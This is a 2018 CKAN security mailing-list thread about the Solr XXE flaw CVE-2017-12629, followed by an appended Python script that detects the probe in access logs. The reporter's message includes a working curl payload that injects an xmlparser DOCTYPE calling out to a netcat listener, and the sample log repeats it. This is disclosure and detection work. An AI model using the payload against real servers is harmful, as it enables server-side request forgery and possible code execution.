[CKAN-Security] solr 6.2

Adrià Mercader adria.mercader at okfn.org
Thu Feb 22 08:55:10 UTC 2018


Hi JD,

Many thanks for the report. We have received reports of this issue and
are preparing patches and/or updates to help mitigate it. If you are using
the Docker image included in contrib the easiest fix is just to use the
solr:6.2.2 image as this one includes the fix for the issue:

https://lucene.apache.org/solr/news.html#18-october-2017-apache-solrtm-662-available

It only includes this bug fix so it should not cause any compatibility
issues.

We will update the image in contrib asap, and let you know of any
mitigation steps that we take.

Best regards,

Adrià

On 21 February 2018 at 08:53, JD Bothma <jd at openup.org.za> wrote:

> Hi
>
> We've contracted someone to pen-test data.vulekamali.gov.za who found the
> following critical vulnerability in CKAN 6.2 as used in the Dockerfile
> under contrib
>
> https://www.cvedetails.com/cve/CVE-2017-12629/
> https://issues.apache.org/jira/browse/SOLR-11477?attachmentOrder=asc
>
> We're launching our portal right now so not comfortable upgrading solr
> just yet, but remapping the xmlparser name to the edismax class has
> mitigated it for us for now. See
> https://lucene.apache.org/solr/news.html#12-october-2017-please-secure-your-apache-solr-servers-since-a-zero-day-exploit-has-been-reported-on-a-public-mailing-list
>
> I confirmed the vulnerability with the following curl request against a
> locally-running ckan instance:
> curl -v localhost/api/3/action/package_search?q=%7B%21xmlparser%20v%3D%27%3C%21DOCTYPE%20a%20SYSTEM%20%22http%3A%2F%2F172.18.0.1%3A8888%2FDEADBEEF%22%3E%3Ca%3E%3C%2Fa%3E%27%7D
>
> On the IP 172.18.0.1 port 8888 I was running nc -l -p 8888 - when running
> the request against ckan, I saw a GET request in nc. You can also verify
> the vulnerability by looking for "Connection Refused" in the error response
> which shows the server tried to request the DOCTYPE you told it to, and
> would have executed malicious code you would have served.
>
> Best
> JD
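Detection logic for the probe pattern JD describes, as an added example that is not part of this thread nor of CKAN or Solr code: it pulls the request target out of web-server access-log lines, URL-decodes the q parameter of package_search requests, and flags Solr local-params that select xmlparser, distinguishing the case where an external DOCTYPE or ENTITY identifier is present. The log lines are constructed samples (the second reuses the request from the thread); the Common Log Format layout, the function names and the verdict labels are assumptions.

```python
"""Detect xmlparser XXE probes (CVE-2017-12629 pattern) in CKAN/Solr access logs."""
import re
from urllib.parse import parse_qs, urlsplit

# Solr local-params syntax that selects the xmlparser, e.g. {!xmlparser v='...'}
XMLPARSER_RE = re.compile(r"\{!\s*xmlparser\b", re.IGNORECASE)
# DOCTYPE/ENTITY carrying an external identifier: SYSTEM "uri" or PUBLIC "id" "uri"
EXTERNAL_DTD_RE = re.compile(
    r'''<!(?:DOCTYPE|ENTITY)\b[^>]*?\b(?:SYSTEM|PUBLIC)\s+(?:"[^"]*"\s+)?["']([^"']+)["']''',
    re.IGNORECASE | re.DOTALL,
)
# Request target in a Common/Combined Log Format line: "GET /path?x=y HTTP/1.1" (assumed layout)
REQUEST_RE = re.compile(r'"(?:GET|POST)\s+(\S+)\s+HTTP/')

def decode_q(request_target):
    """Return the URL-decoded q parameter of 'path?query', or '' if absent."""
    params = parse_qs(urlsplit(request_target).query, keep_blank_values=True)
    return params.get("q", [""])[0]

def classify_q(q):
    """Return ("xxe", uri) if xmlparser is selected with an external DOCTYPE/ENTITY,
    ("xmlparser", None) if xmlparser is selected at all, else None. The bare word
    "xmlparser" in ordinary search text is not a local-param and is left alone."""
    if not XMLPARSER_RE.search(q):
        return None
    m = EXTERNAL_DTD_RE.search(q)
    return ("xxe", m.group(1)) if m else ("xmlparser", None)

def scan_log(lines):
    """Return [(line_number, verdict, external_uri)] for every suspicious request."""
    hits = []
    for n, line in enumerate(lines, 1):
        m = REQUEST_RE.search(line)
        verdict = classify_q(decode_q(m.group(1))) if m else None
        if verdict:
            hits.append((n, verdict[0], verdict[1]))
    return hits

# Constructed sample log (not real traffic); line 2 carries the request from the thread.
SAMPLE_LOG = [
    '10.0.0.7 - - [21/Feb/2018:08:40:01 +0000] "GET /api/3/action/package_search?q=budget%20vote HTTP/1.1" 200 1843',
    '10.0.0.9 - - [21/Feb/2018:08:40:12 +0000] "GET /api/3/action/package_search?q=%7B%21xmlparser%20v%3D%27%3C%21DOCTYPE%20a%20SYSTEM%20%22http%3A%2F%2F172.18.0.1%3A8888%2FDEADBEEF%22%3E%3Ca%3E%3C%2Fa%3E%27%7D HTTP/1.1" 500 231',
    '10.0.0.9 - - [21/Feb/2018:08:40:13 +0000] "GET /api/3/action/package_search?q=title%3Axmlparser HTTP/1.1" 200 92',
    '10.0.0.9 - - [21/Feb/2018:08:40:14 +0000] "GET /api/3/action/package_search?q=%7B%21xmlparser%20v%3D%27%3Ca%3E%3C%2Fa%3E%27%7D HTTP/1.1" 200 92',
]

if __name__ == "__main__":
    for n, verdict, uri in scan_log(SAMPLE_LOG):
        print(f"line {n}: {verdict}" + (f" -> {uri}" if uri else ""))
```

Any "xmlparser" hit is worth a look even without an external identifier, since the remap to edismax described above is what makes that parser name harmless; the "xxe" verdict carries the URI the server was asked to fetch, which is the value to correlate with outbound connection attempts or "Connection Refused" errors.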